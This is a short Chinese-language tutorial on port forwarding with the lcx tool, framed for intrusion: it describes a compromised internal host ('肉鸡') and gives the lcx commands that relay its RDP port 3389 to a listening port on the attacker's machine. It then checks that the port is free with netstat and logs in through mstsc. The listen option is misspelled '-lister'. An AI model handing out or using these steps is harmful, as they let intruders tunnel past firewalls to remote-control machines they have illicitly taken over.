端口转发就是我们在内网中找到一个肉鸡打开一个端口,利用一个工具将此端口映射到外网机器上的端口,这样外网机器上端口实际上就是内网上的端口。
下面讲解一下常用的lcx命令:
lcx -lister 51 3389 //此命令表示控制机器上打开51端口来接受3389接口传来的信息。此命令在攻击机上使用
lcx -slave ip 51 IP 3389 //将被控制机器上的的3389端口转发到控制机器上的51端口 此命令在肉鸡中使用
注意命令的执行要在lcx.exe程序所在的路径执行。而且要使用的端口一定是未被占用的端口。
可以使用命令:
netstat -an | find “51”
如果没有回显信息则证明端口没有被占用。
mstsc,进行远程终端登陆。